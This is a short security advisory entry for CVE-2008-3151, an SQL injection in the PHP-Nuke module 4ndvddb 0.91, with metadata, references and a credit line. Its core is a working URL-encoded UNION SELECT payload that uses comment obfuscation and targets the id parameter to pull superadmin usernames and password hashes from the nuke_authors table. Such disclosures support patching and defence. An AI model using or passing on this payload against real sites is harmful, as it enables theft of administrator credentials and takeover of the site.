Topic : | PHP-NUKE SQL Modules Name 4ndvddb
|
SecurityAlert : 3986
CVE : CVE-2008-3151
CWE : Not in CWE
SecurityRisk : Medium (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : lovebug
Published : 13.07.2008
Affected Software : | PHP-NUKE Modules Name 4ndvddb |
 Advisory Content : Module's Name: 4ndvddb
Module's Version: 0.91
+---------------------------------------+
| SQL Injection Vulnerability PHP-NUKE
| Module's Name: 4ndvddb
| Module's Version: 0.91 |
| found by lovebug |
| RBT-4 |
www.rbt-4.net
+---------------------------------------+
#vuln: modules.php?name=4ndvddb&rop=show_dvd&id=
#sql=
1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,pwd,3,4,5,6,7,
8,9,10%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A
%2Fradminsuper%3D1%2F%2A
References :
http://www.securityfocus.com/bid/30120
http://www.securityfocus.com/archive/1/archive/1/494013/100/0/threaded
http://secunia.com/advisories/30976
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|